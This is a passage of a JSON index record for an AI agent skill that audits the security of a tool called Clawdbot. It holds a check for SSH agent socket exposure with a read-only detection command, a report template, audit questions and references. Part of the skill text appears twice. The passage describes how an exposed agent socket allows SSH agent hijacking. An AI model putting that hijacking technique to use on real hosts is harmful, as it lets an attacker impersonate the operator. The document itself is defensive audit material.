        "body": "What to check:\n\nIs SSH_AUTH_SOCK exposed to containers or sandboxes that run tools for the model?\n\nHow to detect:\n\nenv | grep SSH_AUTH_SOCK\n\nVulnerability: A container that can reach the forwarded agent socket can sign with every key the agent holds and authenticate as the operator to other hosts (SSH agent hijacking).\n\nSeverity: Medium\n\nRemediation:\n\nDo not forward or mount the agent socket into sandboxes or containers that run tools for the model."
      },
      {
        "title": "Security Assessment Questions",
        "body": "When auditing, ask:\n\n1. Exposure: What network interfaces can reach Clawdbot?\n2. Authentication: What verification does each access point require?\n3. Isolation: What boundaries exist between Clawdbot and the host?\n4. Trust: What content sources are considered \"trusted\"?\n5. Auditability: What evidence exists of Clawdbot's actions?\n6. Least Privilege: Does Clawdbot have only necessary permissions?"
      },
      {
        "title": "Principles Applied",
        "body": "Zero modification - The audit itself only reads; configuration is changed only when you explicitly pass --fix\nDefense in depth - Multiple checks catch different attack vectors\nActionable output - Every finding includes a concrete remediation\nExtensible design - New checks integrate naturally"
      },
      {
        "title": "References",
        "body": "Official docs: https://docs.clawd.bot/gateway/security\nOriginal framework: Daniel Miessler on X, https://x.com/DanielMiessler/status/2015865548714975475\nRepository: https://github.com/TheSethRose/Clawdbot-Security-Check\nReport vulnerabilities: security@clawd.bot"
      },
      {
        "title": "Remember",
        "body": "This skill exists to make Clawdbot self-aware of its security posture. Use it regularly, extend it as needed, and never skip the audit."
      }
    ]
  }
}
name]\n\nStep 4: Provide Remediation\n\nFor each finding, output:\n\nSpecific config change needed\nExample configuration\nCommand to apply (if safe)\nReport Template\n═══════════════════════════════════════════════════════════════\n🔒 CLAWDBOT SECURITY AUDIT\n═══════════════════════════════════════════════════════════════\nTimestamp: $(date -Iseconds)\n\n┌─ SUMMARY ───────────────────────────────────────────────\n│ 🔴 Critical:  $CRITICAL_COUNT\n│ 🟠 High:      $HIGH_COUNT\n│ 🟡 Medium:    $MEDIUM_COUNT\n│ ✅ Passed:    $PASSED_COUNT\n└────────────────────────────────────────────────────────\n\n┌─ FINDINGS ──────────────────────────────────────────────\n│ 🔴 [CRITICAL] $VULN_NAME\n│    Finding: $DESCRIPTION\n│    → Fix: $REMEDIATION\n│\n│ 🟠 [HIGH] $VULN_NAME\n│    ...\n└────────────────────────────────────────────────────────\n\nThis audit was performed by Clawdbot's self-security framework.\nNo changes were made to your configuration.\n\nExtending the Skill\n\nTo add new security checks:\n\nIdentify the vulnerability - What misconfiguration creates risk?\nDetermine detection method - What config key or system state reveals it?\nDefine the baseline - What is the secure configuration?\nWrite detection logic - Shell commands or file parsing\nDocument remediation - Specific steps to fix\nAssign severity - Critical, High, Medium, Low\nExample: Adding SSH Hardening Check\n## 14. SSH Agent Forwarding 🟡 Medium\n\n**What to check:** Is SSH_AUTH_SOCK exposed to containers?\n\n**Detection:**\n```bash\nenv | grep SSH_AUTH_SOCK\n\n\nVulnerability: Container escape via SSH agent hijacking.\n\nSeverity: Medium\n\n\n## Security Assessment Questions\n\nWhen auditing, ask:\n\n1. **Exposure:** What network interfaces can reach Clawdbot?\n2. **Authentication:** What verification does each access point require?\n3. **Isolation:** What boundaries exist between Clawdbot and the host?\n4. **Trust:** What content sources are considered \"trusted\"?\n5. 
**Auditability:** What evidence exists of Clawdbot's actions?\n6. **Least Privilege:** Does Clawdbot have only necessary permissions?\n\n## Principles Applied\n\n- **Zero modification** - This skill only reads; never changes configuration\n- **Defense in depth** - Multiple checks catch different attack vectors\n- **Actionable output** - Every finding includes a concrete remediation\n- **Extensible design** - New checks integrate naturally\n\n## References\n\n- Official docs: https://docs.clawd.bot/gateway/security\n- Original framework: [ᴅᴀɴɪᴇʟ ᴍɪᴇssʟᴇʀ on X](https://x.com/DanielMiessler/status/2015865548714975475)\n- Repository: https://github.com/TheSethRose/Clawdbot-Security-Check\n- Report vulnerabilities: security@clawd.bot\n\n---\n\n**Remember:** This skill exists to make Clawdbot self-aware of its security posture. Use it regularly, extend it as needed, and never skip the audit."
  },
  "trust": {
    "sourceLabel": "tencent",
    "provenanceUrl": "https://clawhub.ai/TheSethRose/clawdbot-security-check",
    "publisherUrl": "https://clawhub.ai/TheSethRose/clawdbot-security-check",
    "owner": "TheSethRose",
    "version": "2.2.2",
    "license": null,
    "verificationStatus": "Indexed source record"
  },
  "links": {
    "detailUrl": "https://openagent3.xyz/skills/clawdbot-security-check",
    "downloadUrl": "https://openagent3.xyz/downloads/clawdbot-security-check",
    "agentUrl": "https://openagent3.xyz/skills/clawdbot-security-check/agent",
    "manifestUrl": "https://openagent3.xyz/skills/clawdbot-security-check/agent.json",
    "briefUrl": "https://openagent3.xyz/skills/clawdbot-security-check/agent.md"
  }
}